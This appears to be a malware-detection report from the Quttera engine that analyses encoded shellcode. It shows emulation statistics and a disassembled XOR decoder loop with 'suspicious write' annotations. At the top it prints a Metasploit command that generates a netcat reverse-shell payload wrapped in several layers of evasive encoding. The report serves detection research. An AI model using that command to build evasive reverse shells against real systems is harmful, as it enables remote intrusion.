======== Payload investigation statistics ========

Payload generation command:
#msfpayload cmd/unix/reverse_netcat LHOST=192.168.111.129 LPORT=9988 O | msfencode -e x86/shikata_ga_nai -c 9 -t raw | msfencode -e x86/countdown -c 7 -t raw

Suspicious payload offset: 0

Emulation attribute name                  Value
=======================================================
WRITES_TO_PROCESS_STACK_MEMORY            0
BUFFER_INSIDE_WRITES_COUNT                48
REFERENCES_TO_PROCESS_INTERNALS           0
BUFFER_OUTSIDE_WRITES_COUNT               0
FAR_JUMPS_COUNT                           0
FULLY_INITIALIZED_INSTRUCTIONS            100
PROVIDED_ABSOLUTE_MEMORY_ADDRESSES        1
PROC_CALLS_INSIDE_INV_BUFFER              1
BUFFER_OUTSIDE_READS_COUNT                1
UNDEFINED_DIRECT_CALLS                    0
JUMPS_INSIDE_INV_BUFFER                   48
CORRECTLY_PARSED_INSTRUCTIONS             100
MEMORY_MODIFYING_MATH_INSTRUCTIONS        0
BUFFER_INSIDE_READS_COUNT                 0
SYSTEM_CALLS_COUNT                        0
UNRECOGNIZED_CALL_TARGETS                 0
REFERENCES_TO_PROCESS_IMPORTS             0
CORRECT_PROCEDURES_CALLS                  0
EIP_RETRIEVAL_INSTRUCTIONS                0
JUMPS_TO_PROCESS_INTERNALS                0
EXECUTED_ARITHMETIC_INSTRUCTIONS          1
CALLS_TARGETED_IMPORTS_SECTION            0
UNRECOGNIZED_JUMP_TARGETS                 0
CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS       0
REFERENCES_TO_PROCESS_EXPORTS             0
EXECUTES_BITS_OPERATING_INSTRUCTIONS      0
IMMEDIATE_OPERANDS_INSTRUCTIONS           0
INDIRECT_BUFFER_REFERENCES                1
MAX_WRITTEN_MEMORY_BLOCK                  0
CORRECTLY_EXECUTED_INSTRUCTIONS           100
READS_FROM_PROCESS_STACK_MEMORY           1
CALLS_TARGETED_EXPORTS_SECTION            0
-------------------------------------------------------

More about the Quttera investigation engine here.
======== Detection disassembly ========

MOV ECX (0x00000000),0x00000369
CALL 0xBF9D2695
INC ECX (0x00000369)
POP ESI (0x00000000)
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A07),CL (0x6A) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A06),CL (0x69) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A05),CL (0x68) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A04),CL (0x67) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A03),CL (0x66) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A02),CL (0x65) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A01),CL (0x64) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D2A00),CL (0x63) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FF),CL (0x62) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FE),CL (0x61) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FD),CL (0x60) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FC),CL (0x5F) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FB),CL (0x5E) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29FA),CL (0x5D) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F9),CL (0x5C) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F8),CL (0x5B) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F7),CL (0x5A) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F6),CL (0x59) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F5),CL (0x58) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F4),CL (0x57) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F3),CL (0x56) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F2),CL (0x55) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F1),CL (0x54) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29F0),CL (0x53) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EF),CL (0x52) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EE),CL (0x51) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29ED),CL (0x50) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EC),CL (0x4F) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EB),CL (0x4E) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29EA),CL (0x4D) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E9),CL (0x4C) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E8),CL (0x4B) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E7),CL (0x4A) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E6),CL (0x49) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E5),CL (0x48) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E4),CL (0x47) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E3),CL (0x46) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E2),CL (0x45) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E1),CL (0x44) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29E0),CL (0x43) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DF),CL (0x42) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DE),CL (0x41) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DD),CL (0x40) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DC),CL (0x3F) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DB),CL (0x3E) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29DA),CL (0x3D) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29D9),CL (0x3C) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction
XOR [ESI + 0x7 + ECX * 0x1] (0xBF9D29D8),CL (0x3B) ;investigation buffer write instruction [suspicious memory write instruction]
LOOP 0xFA ;random read instruction